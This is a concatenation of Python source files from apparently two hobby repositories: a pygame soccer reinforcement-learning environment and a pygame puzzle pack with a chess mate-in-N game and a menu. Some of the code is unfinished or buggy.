player2 = Player(Point(WIDTH * 2 / 3, HEIGHT / 2), 10, TEAM_RED)
env = SoccerEnv([player1, player2])
agent1 = NaiveAgent(player1, env)
agent2 = NaiveAgent(player2, env)
return env, (agent1, agent2)
run_simulation("test1")
--- FILE SEPARATOR ---
class ExpSolution:
def decision(self):
raise NotImplementedError
--- FILE SEPARATOR ---
#Adapted from Pytorch DQN Tutorial:
#https://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
import ExpSolutions.ExpSolution
import random
import math
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
class SimpleExp3(ExpSolution):
def __init__(self):
self.steps_done = 0
def decision():
sample = random.random()
eps_threshold = EPS_END + (EPS_START - EPS_END) * \
math.exp(-1. * steps_done / EPS_DECAY)
self.steps_done += 1
return sample > eps_threshold
--- FILE SEPARATOR ---
#Will be reserved for UI purpose only
import Engine
def main():
pass
main()
--- FILE SEPARATOR ---
class Point:
def __init__(self, x, y): # Good
self.x = x
self.y = y
def add(self, p): # Good
return Point(self.x + p.x, self.y + p.y)
def sub(self, p): # Good
return Point(self.x - p.x, self.y - p.y)
def mult(self, m):
return Point(self.x * m, self.y * m)
def normSq(p, q): # Good
return (p.x - q.x)**2 + (p.y - q.y)**2
def __str__(self): # Good
return "({},{})".format(self.x, self.y)
def __repr__(self):
return self.__str__()
def __eq__(self, other): # Good
return self.x == other.x and self.y == other.y
--- FILE SEPARATOR ---
# Adapted from pygame.draw tutorial:
# https://www.pygame.org/docs/ref/draw.html
import pygame
from pygame import draw
from Soccer import *
from Point import Point
# Define the colors we will use in RGB format
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
BLUE = ( 0, 0, 255)
GREEN = ( 0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
ENLARGE = 3
XBUFFER = 10
YBUFFER = 10
class Renderer:
def __init__(self, stage):
size = [ENLARGE * WIDTH + 2*XBUFFER,
ENLARGE * HEIGHT + 2*YBUFFER]
self.screen = pygame.display.set_mode(size)
self.stage = stage
def regular_cycle(self):
done = False
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done = True # Flag that we are done so we exit this loop
# Clear the screen and set the screen background
self.screen.fill(WHITE)
# Draw players
for player in self.stage.players:
point = Renderer.__translate(player.center)
if player.team == TEAM_BLUE:
draw.circle(self.screen, BLUE, point, player.radius)
else:
draw.circle(self.screen, RED, point, player.radius)
# Draw ball
ball = self.stage.ball
point = Renderer.__translate(ball.center)
draw.circle(self.screen, GREEN, point, ball.radius)
# Draw borders
r = Renderer.__translate(Point(0, HEIGHT)) + (WIDTH*ENLARGE, HEIGHT*ENLARGE)
draw.rect(self.screen, BLACK, r, 2)
# Draw goal
g1, g2 = self.stage.walls[2].inner, self.stage.walls[3].inner
gg1, gg2 = [0, 0], [0, 0]
for i in range(2):
gg1[i], gg2[i] = Renderer.__translate(g1[i]), Renderer.__translate(g2[i])
draw.line(self.screen, YELLOW, *gg1, 2)
draw.line(self.screen, YELLOW, *gg2, 2)
pygame.display.flip()
return done
def __translate(p):
p = p.mult(3)
p = p.add(Point(XBUFFER, YBUFFER))
return (int(p.x), int(p.y))
--- FILE SEPARATOR ---
# implements gym.Env
# TODO: work out action_space
# TODO: make random non-repetitive
import random
from Soccer import *
import numpy as np
from math import fabs
import gym
from gym import spaces
import pygame
from Renderer import Renderer
from Point import Point
END_CONDITION = lambda x: x >= 1e10
# END_CONDITION = lambda score: score[0] >= 7 or score[1] >= 7
WIDTH = 400
HEIGHT = 200
TEAM_RED = 1
TEAM_BLUE = 2
class SoccerEnv(gym.Env):
"""
Only ONE instance is supposed to run at a time
"""
def __init__(self, players):
pygame.init()
self.players = players
self.seed()
self.stage = Stage()
self.steps = 0
self.action_space = spaces.Discrete(4)
self.discrete_space = spaces.Box(low=np.array([0, 0]),
high=np.array([WIDTH / 4, HEIGHT / 4]), dtype=int)
self.continuous_space = spaces.Box(low=np.array([0, 0]),
high=np.array([WIDTH, HEIGHT]))
self.renderer = Renderer(self.stage)
self.clock = pygame.time.Clock()
def seed(self, seed=None):
random.seed(seed)
def step(self, actions):
self.steps += 1
game_state = self.stage.move_cycle(actions, self.players)
reward = []
for player in self.players:
reward.append(self.reward(player, self.state[-1]))
# stage needs to give feedback if ball is scored.
return self.state, reward, done
def screen(self):
return self.state
def reset(self):
self.stage = Stage()
self.steps = 0
self.clock = pygame.time.Clock()
def render(self):
self.clock.tick(3)
return self.renderer.regular_cycle()
def close(self):
pygame.quit()
def reward(self, player, response):
if response.x == 1:
if response.y == player.team:
return -100
else:
return 100
elif response.x == 2:
if response.y == player.team:
return -100
else:
return 0
else:
if response.y == player.team:
return 1
else:
return -1
class Stage:
def __init__(self):
bounds = [Point(0, 0), Point(WIDTH, 0), Point(0, HEIGHT), Point(WIDTH, HEIGHT)]
# Blue goal is walls[2] (Left), Red goal is walls[3] (Right)
self.walls = [
Wall((bounds[0], bounds[1])), Wall((bounds[2], bounds[3])),
Goal((bounds[0], bounds[2]),
(Point(0, HEIGHT / 3), Point(0, HEIGHT * 2 / 3))),
Goal((bounds[1], bounds[3]),
(Point(WIDTH, HEIGHT / 3), Point(WIDTH, HEIGHT * 2 / 3)))
]
self.ball = Ball(Point(WIDTH / 2, HEIGHT / 2))
self.possession = (TEAM_BLUE, TEAM_RED)[random.randint(0, 1) == 0]
self.score = [0, 0]
def move_cycle(self, actions, players):
"""
Returns new state of game.
0 - continue
1 - goal scored
2 - penalty
"""
for i in range(len(players)):
player = players[i]
action = actions[i]
player.move(action)
for other in players:
if Circle.collide(player, other) and player != other:
player.revert_move()
if Circle.collide(player, self.ball):
self.possession = player.team
self.ball.move(player)
self.ball.move()
scored = self.__ball_scored()
if scored:
self.ball.replace()
if scored == TEAM_RED:
self.score[1] += 1
return (1, TEAM_RED)
else:
self.score[0] += 1
return (1, TEAM_BLUE)
elif self.__ball_out_bounds():
if self.possession == TEAM_BLUE:
self.ball.restart(Point(WIDTH / 4, HEIGHT / 2))
else:
self.ball.restart(Point(WIDTH * 3/4, HEIGHT / 2))
return (2, self.possession)
else:
return (0, None)
def __ball_scored(self):
if self.walls[2].has_scored(self.ball) \
or self.ball.center.x < 0:
return TEAM_RED
elif self.walls[3].has_scored(self.ball) \
or self.ball.center.x > WIDTH:
return TEAM_BLUE
else:
return 0
def __ball_out_bounds(self):
return self.walls[0].collide(self.ball) \
or self.walls[1].collide(self.ball) \
or self.walls[2].collide(self.ball) \
or self.walls[3].collide(self.ball)
class Wall:
HORIZONTAL = 1
VERTICAL = 2
def __init__(self, bounds):
self.bounds = bounds
if bounds[0].x == bounds[1].x:
self.orientation = VERTICAL
else:
self.orientation = HORIZONTAL
def collide(self, c):
if self.orientation == HORIZONTAL:
# Check y values
return fabs(c.center.y - self.bounds[0].y) <= c.radius
else:
# Check x values
return fabs(c.center.x - self.bounds[0].x) <= c.radius
def __str__(self): # Good
return "Bound 1: {}\nBound 2: {} \nOrientation: {}"\
.format(self.bounds[0], self.bounds[1], self.orientation)
class Goal(Wall):
def __init__(self, bounds, net): # Good
super().__init__(bounds)
self.net = net
def has_scored(self, b): # Good
# check if b is within bounds
bound1 = min(self.net[0].y, self.net[1].y)
bound2 = max(self.net[0].y, self.net[1].y)
within_bounds = b.center.y >= bound1 and b.center.y <= bound2
return net.collide(b) and within_bounds
def collide(self, b): # Good
return super().collide(b) and not self.has_scored(b)
def __str__(self): # Good
return super().__str__() + "\nGoal bound 1: {}\nGoal bound 2: {}"\
.format(self.net[0], self.net[1])
class Circle:
def __init__(self, center, radius): # Good
self.start_pos = center
self.center = center
self.radius = radius
self.x_vel = 0
self.y_vel = 0
def move(self): # Good
dp = Point(self.x_vel, self.y_vel)
self.center = self.center.add(dp)
def collide(c0, c1):
return Point.normSq(c0.center, c1.center) \
<= (c0.radius + c1.radius)**2
def restart(self, center):
self.center = center
self.x_vel, self.y_vel = 0, 0
def __str__(self): # Good
return "\nCenter: {} \nRadius: {}"\
.format(self.center, self.radius)
class Ball(Circle):
def __init__(self, center): # Good
super().__init__(center, 5)
def move(self, player):
# fix this
"""momentum-based kicking"""
player_mass = .5
delx, dely = random.random(), random.random()
self.x_vel += player_mass*player.x_vel + delx
self.y_vel += player_mass*player.y_vel + dely
class Player(Circle):
def __init__(self, center, max_speed, team): # Good
super().__init__(center, 20)
self.max_speed_sq = max_speed**2
self.prev_pos = center
self.team = team
def revert_move(self): # Good
self.center = self.prev_pos
def move(self, action): # Good
"""takes 'direction key' input"""
if action == 0:
dx, dy = 0, 1
elif action == 1:
dx, dy = 1, 0
elif action == 2:
dx, dy = 0, -1
elif action == 3:
dx, dy = -1, 0
else:
dx, dy = 0, 0
# Check for max speed
if ((self.vel_x + dx)**2 + (self.vel_y + dy)**2) \
<= self.max_speed_sq:
self.x_vel += dx
self.y_vel += dy
self.prev_pos = self.center
super(Player, self).move()
def __str__(self): # Good
return super(Player, self).__str__() + "\nMax Speed: {} \n Team: {}"\
.format(self.max_speed_sq**.5, self.team)
--- FILE SEPARATOR ---
#Adapted from Pytorch DQN Tutorial:
#https://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
import Engine
import math
import random
import numpy as np
from itertools import count
env, agents = Engine.make("Naive")
num_episodes = 50
for i_episode in range(num_episodes):
# Initialize the environment and state
env.reset()
state = env.screen()
for t in count():
actions = []
for agent in agents:
# Select and perform an action
actions.append(agent.select_action(state))
next_state, rewards, done = env.step(actions)
# rewards = torch.tensor([rewards], device=device)
if done:
next_state = None
for i in range(len(agents)):
# Store the transition in memory
agent = agents[i]
action = actions[i]
reward = rewards[i]
agent.memory.push(state, action, next_state, reward)
# Move to the next state
state = next_state
for agent in agents:
# Perform one step of the optimization (on the target network)
agent.optimize_model(i_episode, done)
if done:
break
print('Complete')
env.close()
|
[
"/Agents/Agent.py",
"/Agents/MonteCarloAgent.py",
"/Agents/NaiveAgent.py",
"/Engine.py",
"/ExpSolutions/ExpSolution.py",
"/ExpSolutions/SimpleExp3.py",
"/Main.py",
"/Point.py",
"/Renderer.py",
"/SoccerEnv.py",
"/Training.py"
] |
00tpotter/PuzzlePack
|
# Chess class
import pygame
import time
import sys
import random
import numpy as np
from typing import List
pygame.font.init()
WIDTH = 800
squareSize = WIDTH / 8
WHITE = (255, 255, 255)
GREY = (128, 128, 128)
YELLOW = (255, 255, 200)
BLUE = (50, 255, 255)
RED = (255, 0, 0)
BLACK = (0, 0, 0)
PURPLE = (255, 175, 255)
LIGHT_RED = (255, 175, 175)
ORANGE = (255, 200, 145)
SCALE = 50
font = pygame.font.SysFont('timesnewroman.ttc', 48)
small_font = pygame.font.SysFont('consola', 32)
##piece class, passed in a single number from 0 to 13, representing the different pieces.
# None = 0
# King = 1
# Pawn = 2
# Knight = 3
# Bishop = 4
# Rook = 5
# Queen = 6
# The above is for white pieces, for black pieces of the same type add 7.
class Piece:
type = 0
side = 0
moved = False
enPassant = False
def __init__(self, type):
self.type = type
if type > 6:
self.type = type - 7
self.side = 1
str = "chessImages/"
if self.side == 0:
str += "white"
else:
str += "black"
if self.type == 1:
str += "King.png"
elif self.type == 2:
str += "Pawn.png"
elif self.type == 3:
str += "Knight.png"
elif self.type == 4:
str += "Bishop.png"
elif self.type == 5:
str += "Rook.png"
elif self.type == 6:
str += "Queen.png"
self.image = pygame.image.load(str)
self.image = pygame.transform.scale(self.image, (100, 100))
def isKing(self):
return type == 1
def isPawn(self):
return type == 2
def isKnight(self):
return type == 3
def isBishop(self):
return type == 4
def isRook(self):
return type == 5
def isQueen(self):
return type == 6
def whichSide(self):
return self.side
def hasMoved(self):
return self.moved
def toString(self):
out = ""
if self.side == 0:
out += "w"
else:
out += "b"
if self.type == 1:
out += "k"
elif self.type == 2:
out += "p"
elif self.type == 3:
out += "n"
elif self.type == 4:
out += "b"
elif self.type == 5:
out += "r"
elif self.type == 6:
out += "q"
else:
out = "bug"
return out
def squareToIndex(stringMove):
num1 = -1
num2 = -1
p = stringMove[0]
if p == 'a':
num1 = 1
if p == 'b':
num1 = 2
if p == 'c':
num1 = 3
if p == 'd':
num1 = 4
if p == 'e':
num1 = 5
if p == 'f':
num1 = 6
if p == 'g':
num1 = 7
if p == 'h':
num1 = 8
num2 = (8 - int(stringMove[1])) * 8 - 1
return num2 + num1
def loadPuzzles():
text = open("cpuzzles.txt", "r")
lines = [line.split(',') for line in text]
return lines
class Square:
occupiedBy = None
def __init__(self, index):
self.row = int(index / 8)
self.col = int(index % 8)
self.y = int(self.row * squareSize)
self.x = int(self.col * squareSize)
if (self.row + self.col) % 2 == 0:
self.color = WHITE
else:
self.color = BLACK
self.hasPiece = False
self.highlighted = False
def highlight(self):
self.highlighted = True
def unhighlight(self):
self.highlighted = False
def draw(self, WIN):
pygame.draw.rect(WIN, self.color, (self.x, self.y + SCALE, squareSize, squareSize))
if self.hasPiece:
WIN.blit(self.occupiedBy.image, (self.x, self.y + SCALE))
if self.highlighted:
pygame.draw.circle(WIN, GREY, (self.x + squareSize/2, self.y + squareSize/2 + SCALE), 15)
def placePiece(self, Piece):
self.occupiedBy = Piece
self.hasPiece = True
def movePiece(self):
self.occupiedBy = None
self.hasPiece = False
class Board:
board: List[Square] = [Square(i) for i in range(64)]
def printBoard(self):
for square in self.board:
if square.hasPiece == False:
print("[ ]", end = '')
else:
print("[", square.occupiedBy.toString(), "]", sep = '', end = '')
if (square.col == 7):
print()
def positionFromFen(self, fen):
pos = 0
first = fen.index(" ")
second = fen.index(" ", first + 1)
third = fen.index(" ", second + 1)
fourth = fen.index(" ", third + 1)
turn = 0
C1 = False
C2 = False
C3 = False
C4 = False
enPassant = -1
for i in range(first):
x = fen[i]
if (x.isdigit()):
pos += int(x)
elif (x == '/'):
continue
elif (x == 'p'):
self.board[pos].placePiece(Piece(9))
pos = pos + 1
elif (x == 'k'):
self.board[pos].placePiece(Piece(8))
pos = pos + 1
elif (x == 'q'):
self.board[pos].placePiece(Piece(13))
pos = pos + 1
elif (x == 'b'):
self.board[pos].placePiece(Piece(11))
pos = pos + 1
elif (x == 'n'):
self.board[pos].placePiece(Piece(10))
pos = pos + 1
elif (x == 'r'):
self.board[pos].placePiece(Piece(12))
pos = pos + 1
elif (x == 'P'):
self.board[pos].placePiece(Piece(2))
pos = pos + 1
elif (x == 'K'):
self.board[pos].placePiece(Piece(1))
pos = pos + 1
elif (x == 'R'):
self.board[pos].placePiece(Piece(5))
pos = pos + 1
elif (x == 'Q'):
self.board[pos].placePiece(Piece(6))
pos = pos + 1
elif (x == 'B'):
self.board[pos].placePiece(Piece(4))
pos = pos + 1
elif (x == 'N'):
self.board[pos].placePiece(Piece(3))
pos = pos + 1
else:
print("invalid FEN")
pygame.quit()
sys.exit()
if fen[first + 1] == 'b':
turn = 1
for i in range(second+1, third):
if fen[i] == 'K':
C1 = True
if fen[i] == 'Q':
C2 = True
if fen[i] == 'k':
C3 = True
if fen[i] == 'q':
C4 = True
num1 = -1
num2 = -1
if fen[third + 1] != '-':
p = fen[third + 1]
if p == 'a':
num1 = 1
if p == 'b':
num1 = 2
if p == 'c':
num1 = 3
if p == 'd':
num1 = 4
if p == 'e':
num1 = 5
if p == 'f':
num1 = 6
if p == 'g':
num1 = 7
if p == 'h':
num1 = 8
num2 = (8 - int(fen[third + 2])) * 8 - 1
enPassant = num1 + num2
return [turn, C1, C2, C3, C4, enPassant]
class Chess:
def selectPiece(self, B, index):
piece = B.board[index].occupiedBy
if piece.type == 2:
if piece.side == 0:
return self.pawn_moves_w(B, index)
else:
return self.pawn_moves_b(B, index)
elif piece.type == 1:
return self.king_moves(B, index)
elif piece.type == 3:
return self.knight_moves(B, index)
elif piece.type == 4:
return self.bishop_moves(B, index)
elif piece.type == 5:
return self.rook_moves(B, index)
elif piece.type == 6:
return self.queen_moves(B, index)
def pawn_moves_w(self, B, index):
moves = []
if index >= 8:
if B.board[index - 8].hasPiece == False:
moves.append(index - 8)
if index >= 16:
if (B.board[index - 16].hasPiece == False and int(index / 8) == 6):
moves.append(index - 16)
if index >= 7:
if B.board[index-7].hasPiece:
if B.board[index - 7].occupiedBy.side == 1:
moves.append(index - 7)
if index >= 9:
if B.board[index-9].hasPiece:
if B.board[index - 9].occupiedBy.side == 1:
moves.append(index - 9)
if (index < 31 and index > 23):
if B.board[index + 1].hasPiece:
if B.board[index + 1].occupiedBy.side == 1 and B.board[index + 1].occupiedBy.enPassant:
moves.append(index - 7)
if (index < 32 and index > 24):
if B.board[index - 1].hasPiece:
if B.board[index - 1].occupiedBy.side == 1 and B.board[index - 1].occupiedBy.enPassant:
moves.append(index - 9)
return moves
def pawn_moves_b(self, B, index):
moves = []
if index <= 55:
if B.board[index + 8].hasPiece == False:
moves.append(index + 8)
if index <= 47:
if (B.board[index + 16].hasPiece == False and int(index / 8) == 1):
moves.append(index + 16)
if index <= 56:
if B.board[index+7].hasPiece:
if B.board[index + 7].occupiedBy.side == 0:
moves.append(index + 7)
if index <= 54:
if B.board[index+9].hasPiece:
if B.board[index + 9].occupiedBy.side == 0:
moves.append(index + 9)
if (index < 39 and index > 31):
if B.board[index + 1].hasPiece:
if B.board[index + 1].occupiedBy.side == 0 and B.board[index + 1].occupiedBy.enPassant:
moves.append(index + 9)
if (index < 40 and index > 32):
if B.board[index - 1].hasPiece:
if B.board[index - 1].occupiedBy.side == 0 and B.board[index - 1].occupiedBy.enPassant:
moves.append(index + 7)
return moves
def knight_moves(self, B, index):
moves = []
side = B.board[index].occupiedBy.side
i = int(index / 8)
j = index % 8
for x in range(-2, 3):
for y in range(-2, 3):
if x ** 2 + y ** 2 == 5:
if self.on_board((x + i, y + j)):
if B.board[index + 8*x + y].hasPiece == False:
moves.append(index + x*8 + y)
elif B.board[index + 8*x + y].occupiedBy.side != side:
moves.append(index + x*8 + y)
return moves
def bishop_moves(self, B, index):
moves = []
side = B.board[index].occupiedBy.side
i = int(index / 8)
j = index % 8
diagonals = [[[i + x, j + x] for x in range(1, 8)],
[[i + x, j - x] for x in range(1, 8)],
[[i - x, j + x] for x in range(1, 8)],
[[i - x, j - x] for x in range(1, 8)]]
for direction in diagonals:
for position in direction:
if self.on_board(position):
posIndex = position[0] * 8 + position[1]
if B.board[posIndex].hasPiece == False:
moves.append(posIndex)
elif B.board[posIndex].occupiedBy.side != side:
moves.append(posIndex)
break
else:
break
return moves
def rook_moves(self, B, index):
moves = []
side = B.board[index].occupiedBy.side
i = int(index / 8)
j = index % 8
columns = [[[i + x, j] for x in range(1, 8 - i)],
[[i - x, j] for x in range(1, 1 + i)],
[[i, j + x] for x in range(1, 8 - j)],
[[i, j - x] for x in range(1, 1 + j)]]
for direction in columns:
for position in direction:
if self.on_board(position):
posIndex = position[0] * 8 + position[1]
if B.board[posIndex].hasPiece == False:
moves.append(posIndex)
elif B.board[posIndex].occupiedBy.side != side:
moves.append(posIndex)
break
else:
break
return moves
def queen_moves(self, B, index):
m1 = self.bishop_moves(B, index)
m2 = self.rook_moves(B, index)
for i in m2:
m1.append(i)
return m1
def king_moves(self, B, index):
moves = []
side = B.board[index].occupiedBy.side
i = int(index / 8)
j = index % 8
pairs = [[i-1, j-1], [i-1, j], [i-1, j+1], [i, j-1],
[i, j+1], [i+1, j-1], [i+1, j], [i+1, j+1]]
for position in pairs:
if self.on_board(position):
posIndex = position[0] * 8 + position[1]
if B.board[posIndex].hasPiece == False:
moves.append(posIndex)
elif B.board[posIndex].occupiedBy.side != side:
moves.append(posIndex)
king = B.board[index].occupiedBy
if king.side == 0:
if king.hasMoved() == False and B.board[63].hasPiece:
if B.board[61].hasPiece == False and B.board[62].hasPiece == False and B.board[63].occupiedBy.hasMoved() == False:
moves.append(62)
if king.hasMoved() == False and B.board[56].hasPiece:
if B.board[59].hasPiece == False and B.board[58].hasPiece == False and B.board[57].hasPiece == False and B.board[56].occupiedBy.hasMoved() == False:
moves.append(58)
if king.side == 1:
if king.hasMoved() == False and B.board[7].hasPiece:
if B.board[5].hasPiece == False and B.board[6].hasPiece == False and B.board[7].occupiedBy.hasMoved() == False:
moves.append(6)
if king.hasMoved() == False and B.board[0].hasPiece:
if B.board[3].hasPiece == False and B.board[2].hasPiece == False and B.board[1].hasPiece == False and B.board[0].occupiedBy.hasMoved() == False:
moves.append(2)
return moves
def on_board(self, position):
if position[0] > 7 or position[0] < 0 or position[1] > 7 or position[1] < 0:
return False
return True
def highlight_squares(self, B, moves):
for i in moves:
B.board[i].highlight()
def unhighlight_squares(self, B, moves):
for i in moves:
B.board[i].unhighlight()
def update_display(self, win, Board, score, winIn):
for square in Board.board:
square.draw(win)
text1 = font.render("Score: " + str(score), True, RED)
text2 = font.render("Find mate in " + str(winIn), True, RED)
rect1 = text1.get_rect()
rect1.center = (200, 25)
rect2 = text2.get_rect()
rect2.center = (600, 25)
win.blit(text1, rect1)
win.blit(text2, rect2)
# Buttons
# New game button
new = small_font.render("NEW GAME", True, BLACK, LIGHT_RED)
newRect = new.get_rect()
newRect.center = (WIDTH // 6, SCALE // 2)
pygame.draw.rect(win, LIGHT_RED, [0, 0, WIDTH // 3, SCALE])
win.blit(new, newRect)
# Timer
timer = small_font.render("Score: " + str(score), True, BLACK, ORANGE)
timerRect = timer.get_rect()
timerRect.center = (3 * (WIDTH // 6), SCALE // 2)
pygame.draw.rect(win, ORANGE, [WIDTH // 3, 0, WIDTH // 3, SCALE])
win.blit(timer, timerRect)
# Mate in
mate = small_font.render("Mate in: " + str(winIn), True, BLACK, YELLOW)
mateRect = mate.get_rect()
mateRect.center = (5 * (WIDTH // 6), SCALE // 2)
pygame.draw.rect(win, YELLOW, [2 * (WIDTH // 3), 0, WIDTH // 3, SCALE])
win.blit(mate, mateRect)
# Back to menu button
menu = small_font.render("BACK TO MENU", True, BLACK, PURPLE)
menuRect = menu.get_rect()
menuRect.center = (WIDTH // 2, (17 * SCALE) + (SCALE // 2))
pygame.draw.rect(win, PURPLE, [0, 17 * SCALE, WIDTH, SCALE])
win.blit(menu, menuRect)
pygame.display.update()
def findNode(self, pos):
x,y = pos
row = (y - SCALE) // squareSize
col = x // squareSize
return int(row)*8 + int(col)
def playGame(self):
score_file = open("chess_high_score.txt", "r")
score = score_file.read().splitlines() # read in the best time/high score
score_file.close()
pygame.init()
WIN = pygame.display.set_mode((WIDTH,WIDTH + (SCALE*2)))
pygame.display.set_caption("Chess")
B = Board()
counter = -1
puzzles = loadPuzzles()
temp1 = list(range(0, 19))
temp2 = list(range(20,39))
temp3 = list(range(40,59))
random.shuffle(temp1)
random.shuffle(temp2)
random.shuffle(temp3)
temp = temp1[0:10] + temp2[0:10] + temp3[0:10]
for puzzleNum in temp:
winIn = 3
if counter < 9:
winIn = 2
counter += 1
for sq in B.board:
sq.movePiece()
fen = puzzles[puzzleNum][0]
[t, c1, c2, c3, c4, ep] = B.positionFromFen(fen)
if (c1 == False):
if B.board[63].hasPiece:
B.board[63].occupiedBy.moved = True
if (c2 == False):
if B.board[56].hasPiece:
B.board[56].occupiedBy.moved = True
if (c3 == False):
if B.board[7].hasPiece:
B.board[7].occupiedBy.moved = True
if (c4 == False):
if B.board[0].hasPiece:
B.board[0].occupiedBy.moved = True
if ep != -1:
B.board[ep].occupiedBy.enPassant = True
# B.printBoard()
moveNum = t
correct = True
moves = []
selected = False
selectedSquare = -1
moveList = puzzles[puzzleNum][1:]
for move in range(len(moveList)):
computerMove = False
if move % 2 == 1:
computerMove = True
wholeMove = moveList[move]
move1 = wholeMove[0:2]
move2 = wholeMove[2:4]
m1 = squareToIndex(move1)
m2 = squareToIndex(move2)
moveNotMade = True
while moveNotMade:
pygame.time.delay(25)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if computerMove:
pygame.time.delay(500)
moves = self.selectPiece(B, m1)
self.highlight_squares(B, moves)
self.update_display(WIN, B, counter, winIn)
pygame.time.delay(500)
piece = B.board[m1].occupiedBy
B.board[m2].placePiece(piece)
B.board[m1].movePiece()
self.unhighlight_squares(B, moves)
self.update_display(WIN, B, counter, winIn)
moveNotMade = False
moveNum += 1
break
if event.type == pygame.MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
tempCol = pos[0] // squareSize
tempRow = (pos[1] - SCALE) // squareSize
if (tempCol < 8 and tempCol >= 0) and (tempRow < 8 and tempRow >= 0):
sq = self.findNode(pos)
if selected == False:
if B.board[sq].hasPiece:
piece = B.board[sq].occupiedBy
if (piece.side == moveNum % 2):
moves = self.selectPiece(B, sq)
self.highlight_squares(B, moves)
selectedSquare = sq
selected = True
else:
print("It is not your turn!")
else:
print("No piece here")
else:
choseMove = False
for i in moves:
if i == sq:
piece = B.board[selectedSquare].occupiedBy
if sq != m2 or selectedSquare != m1:
print("game over!")
moveNotMade = False
correct = False
break
if piece.type == 2:
if (abs(selectedSquare - sq) == 16):
piece.enPassant = True
elif abs(selectedSquare - sq) != 8:
if B.board[sq].hasPiece == False:
if piece.side == 0:
B.board[sq + 8].occupiedBy = None
B.board[sq + 8].hasPiece = False
else:
B.board[sq - 8].occupiedBy = None
B.board[sq - 8].hasPiece = False
if piece.type == 1:
if (selectedSquare - sq == -2):
rook = B.board[selectedSquare + 3].occupiedBy
B.board[selectedSquare + 1].placePiece(rook)
B.board[selectedSquare + 3].movePiece()
if (selectedSquare - sq == 2):
rook = B.board[selectedSquare - 4].occupiedBy
B.board[selectedSquare - 1].placePiece(rook)
B.board[selectedSquare - 4].movePiece()
B.board[sq].placePiece(piece)
B.board[selectedSquare].movePiece()
selectedSquare = -1
selected = False
self.unhighlight_squares(B, moves)
moves = []
moveNum += 1
moveNotMade = False
choseMove = True
piece.moved = True
for s in B.board:
if s.occupiedBy != None:
if s.occupiedBy.type == 2 and s.occupiedBy.side == moveNum % 2:
s.occupiedBy.enPassant = False
if correct == False:
break
if choseMove == False:
self.unhighlight_squares(B, moves)
moves = []
if B.board[sq].hasPiece:
piece = B.board[sq].occupiedBy
if (piece.side == moveNum % 2):
moves = self.selectPiece(B, sq)
self.highlight_squares(B, moves)
selectedSquare = sq
selected = True
else:
print("It is not your turn!")
else:
print("No piece here")
else:
choseMove = False
else:
# New game button
if (pos[0] < WIDTH // 3 and pos[0] >= 0) and (pos[1] < SCALE and pos[1] >= 0):
self.playGame()
# Back to menu button
if (pos[0] < WIDTH and pos[0] >= 0) and (pos[1] < WIDTH + (SCALE*2) and pos[1] >= 1 * SCALE):
return
self.update_display(WIN, B, counter, winIn)
if correct == False:
break
if correct == False:
break
if correct:
print("correct")
else:
break
font = pygame.font.SysFont('timesnewroman.ttc', 100)
text = font.render("Game Over!", True, RED)
rect = text.get_rect()
rect.center = (WIDTH / 2, WIDTH / 2)
WIN.blit(text, rect)
font = pygame.font.SysFont('timesnewroman.ttc', 48)
test7 = " "
if counter > int(score[0]):
test7 = "New high score: " + str(counter)
with open("chess_high_score.txt", "w") as out:
out.write("{}\n".format(str(counter)))
score_file.close()
else:
test7 = "Final score: " + str(counter)
text2 = font.render(test7, True, RED)
rect2 = text2.get_rect()
rect2.center = (WIDTH / 2, WIDTH / 2 + 100)
WIN.blit(text2, rect2)
pygame.display.update()
pygame.time.delay(3000)
self.playGame()
--- FILE SEPARATOR ---
# Test suite for the chess game
--- FILE SEPARATOR ---
# Menu class
import word_search
import chess
import sudoku
import minesweeper
import pygame
class Menu:
def __init__(self):
self.ws_game = word_search.WordSearch()
self.chess_game = chess.Chess()
self.sudoku_game = sudoku.Sudoku()
self.ms_game = minesweeper.Minesweeper()
def printClass(self):
print("This is the menu class.")
def playWordSearch(self):
self.ws_game.playGame()
def playSudoku(self):
self.sudoku_game.playGame()
def playMinesweeper(self):
self.ms_game.playGame()
def playChess(self):
self.chess_game.playGame()
def chooseGame(self):
# Pygame initializations
pygame.init()
pygame.display.set_caption('Puzzle Pack')
scale = 50
width = scale * 15
height = scale * 10
twiceS = scale * 2
halfS = scale // 2
quarterS = scale // 4
halfW = width // 2
quarterW = width // 4
eighthW = width // 8
quartH = height // 4
eighthH = height // 8
running = True
frames = 0
screen = pygame.display.set_mode((width, height))
clock = pygame.time.Clock()
font = pygame.font.SysFont("lato", 32)
small_font = pygame.font.SysFont("lato", 24)
# Colors
white = (255, 255, 255)
grey = (200, 200, 200)
dark_grey = (175, 175, 175)
black = (0, 0, 0)
light_red = (255, 175, 175)
dark_red = (230, 150, 150)
light_orange = (255, 200, 145)
light_yellow = (255, 255, 200)
light_green = (200, 255, 200)
light_blue = (200, 200, 255)
dark_blue = (175, 175, 230)
light_purple = (255, 175, 255)
light_pink = (255, 200, 200)
light_brown = (200, 150, 100)
# Color effects for each button
playSud = False
sudText = white
sudBack = black
sudBorder = 0
playWord = False
wordText = white
wordBack = black
wordBorder = 0
playMine = False
mineText = white
mineBack = black
mineBorder = 0
playCh = False
chText = white
chBack = black
chBorder = 0
textColor = white
backColor = black
border = 0
image = pygame.image.load("PuzzlePack1.png")
# image = pygame.transform.scale(image, (400, 400))
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# User clicks the mouse. Get the position
pos = pygame.mouse.get_pos()
x = pos[0]
y = pos[1]
# Sudoku button pressed
if (x <= scale * 14 and x >= scale * 10) and (y >= scale + quarterS and y <= scale * 3 - quarterS):
sudText = black
sudBack = white
sudBorder = 2
playSud = True
# Word Search button pressed
if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 3 + quarterS and y <= scale * 5 - quarterS):
wordText = black
wordBack = white
wordBorder = 2
playWord = True
# Minesweeper button pressed
if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 5 + quarterS and y <= scale * 7 - quarterS):
mineText = black
mineBack = white
mineBorder = 2
playMine = True
# Chess button pressed
